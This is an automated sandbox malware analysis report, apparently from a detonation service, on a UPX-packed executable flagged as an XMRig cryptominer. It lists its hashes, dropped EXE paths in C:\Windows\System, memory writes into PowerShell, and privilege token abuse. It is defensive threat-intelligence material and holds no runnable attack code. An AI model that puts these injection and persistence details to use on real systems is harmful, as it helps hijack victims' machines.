Malware Analysis Report

2024-11-16 12:03

Sample ID 240612-llqxyszcpa
Target 2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe
SHA256 97d016d0d4b5ff605c07e27c3f8dba76e2932d8314972a52fd00ac8dadaab686
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

97d016d0d4b5ff605c07e27c3f8dba76e2932d8314972a52fd00ac8dadaab686

Threat Level: Known bad

The file 2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

XMRig Miner payload

Xmrig family

xmrig

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

UPX packed file

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-12 09:37

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 09:37

Reported

2024-06-12 09:40

Platform

win7-20240611-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\GFhzKPQ.exe N/A
N/A N/A C:\Windows\System\wuKxtGb.exe N/A
N/A N/A C:\Windows\System\jrJkBtR.exe N/A
N/A N/A C:\Windows\System\DpPffUU.exe N/A
N/A N/A C:\Windows\System\plwcVSe.exe N/A
N/A N/A C:\Windows\System\XIolwQx.exe N/A
N/A N/A C:\Windows\System\ruJYdIw.exe N/A
N/A N/A C:\Windows\System\qomRRQh.exe N/A
N/A N/A C:\Windows\System\AwKlfSe.exe N/A
N/A N/A C:\Windows\System\KowXVJs.exe N/A
N/A N/A C:\Windows\System\LKiWKYZ.exe N/A
N/A N/A C:\Windows\System\PSBynoL.exe N/A
N/A N/A C:\Windows\System\esaXEeA.exe N/A
N/A N/A C:\Windows\System\kYXAfdp.exe N/A
N/A N/A C:\Windows\System\OdxGsxZ.exe N/A
N/A N/A C:\Windows\System\zQSJdBd.exe N/A
N/A N/A C:\Windows\System\fmKUmOe.exe N/A
N/A N/A C:\Windows\System\TwyXRgD.exe N/A
N/A N/A C:\Windows\System\nqUUmlV.exe N/A
N/A N/A C:\Windows\System\NBmPsWh.exe N/A
N/A N/A C:\Windows\System\tesSRpq.exe N/A
N/A N/A C:\Windows\System\aVtmRqF.exe N/A
N/A N/A C:\Windows\System\rqGwdKL.exe N/A
N/A N/A C:\Windows\System\wkgZIkI.exe N/A
N/A N/A C:\Windows\System\YIZgHEr.exe N/A
N/A N/A C:\Windows\System\TsGRgcF.exe N/A
N/A N/A C:\Windows\System\HaaLWqY.exe N/A
N/A N/A C:\Windows\System\HaHmNuE.exe N/A
N/A N/A C:\Windows\System\CXcwdli.exe N/A
N/A N/A C:\Windows\System\wtyCyRe.exe N/A
N/A N/A C:\Windows\System\VHDshhB.exe N/A
N/A N/A C:\Windows\System\ytXOYLM.exe N/A
N/A N/A C:\Windows\System\VGJNDgU.exe N/A
N/A N/A C:\Windows\System\CfiMwCr.exe N/A
N/A N/A C:\Windows\System\CYNWhEl.exe N/A
N/A N/A C:\Windows\System\VxUVdEO.exe N/A
N/A N/A C:\Windows\System\sPrhiHA.exe N/A
N/A N/A C:\Windows\System\upoBeEX.exe N/A
N/A N/A C:\Windows\System\jjatVnb.exe N/A
N/A N/A C:\Windows\System\nxQlhyF.exe N/A
N/A N/A C:\Windows\System\OQAoIYC.exe N/A
N/A N/A C:\Windows\System\arYtlrt.exe N/A
N/A N/A C:\Windows\System\wsMwUpS.exe N/A
N/A N/A C:\Windows\System\ggpHQah.exe N/A
N/A N/A C:\Windows\System\CiPCINT.exe N/A
N/A N/A C:\Windows\System\FbHhDUD.exe N/A
N/A N/A C:\Windows\System\bkZcoMq.exe N/A
N/A N/A C:\Windows\System\kBRvais.exe N/A
N/A N/A C:\Windows\System\lJmIFUq.exe N/A
N/A N/A C:\Windows\System\nXKeopX.exe N/A
N/A N/A C:\Windows\System\PRGFZEI.exe N/A
N/A N/A C:\Windows\System\kcHTDSG.exe N/A
N/A N/A C:\Windows\System\OkyDvPZ.exe N/A
N/A N/A C:\Windows\System\nAdpbev.exe N/A
N/A N/A C:\Windows\System\jvaKpBU.exe N/A
N/A N/A C:\Windows\System\ZsMPVIF.exe N/A
N/A N/A C:\Windows\System\cWnFBdJ.exe N/A
N/A N/A C:\Windows\System\eWxoLIp.exe N/A
N/A N/A C:\Windows\System\GBjFzHj.exe N/A
N/A N/A C:\Windows\System\nsiSNhT.exe N/A
N/A N/A C:\Windows\System\UFnqJdL.exe N/A
N/A N/A C:\Windows\System\EthlXwR.exe N/A
N/A N/A C:\Windows\System\LhoyONH.exe N/A
N/A N/A C:\Windows\System\rTFwdQq.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\aTgomfG.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\fvaLOcz.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\aqnbWOg.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\WrZKiRz.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\EpxiKhX.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\thePOJG.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\OXVxwem.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\dVoKRJe.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\GoijBcf.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\VHSWIWs.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\YExCcqK.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\zCFqJMK.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\nBwRMEe.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\uAJxwID.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\MuOudqc.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\rsWUKIh.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\NFnbDks.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\BwYaTkO.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\yqpTmAT.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\kYHTcHu.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\QRGUDFY.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\OWXGkRV.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\HWzcKlO.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\OtuOVox.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\qAFfHcy.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\YNKVnaV.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\ogaDFqi.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\qhzAIpv.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\HGCVhKi.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\mRVMczn.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\hqpTHMq.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\SEXXOWP.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZRUCHYl.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\DDnkNYE.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\ewuauQZ.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\iPJTWlV.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\icqUCRk.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\UlfBcij.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\BjhUNcZ.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\jbAkJpA.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\TpqdVbb.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\RrvGmWf.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\OrcQLqO.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\YLZcxGt.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\mhgBwcq.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\VGzVGRm.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\eZDBJfS.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\eixwQXA.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\OWoBSAz.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\XlPYdWr.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\baMoTTL.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\ulcJdMt.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\pETjrsK.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\mocYMrG.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\TOXSHcB.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\GCyOsNv.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\gOJiLxI.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\SbVxkJM.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\VgzmpdV.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\fdBDxyk.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\SqWnjwD.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\LQjjBZf.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\CTzCUqS.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\pVSnifH.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2032 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2032 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2032 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2032 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\GFhzKPQ.exe
PID 2032 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\GFhzKPQ.exe
PID 2032 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\GFhzKPQ.exe
PID 2032 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\wuKxtGb.exe
PID 2032 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\wuKxtGb.exe
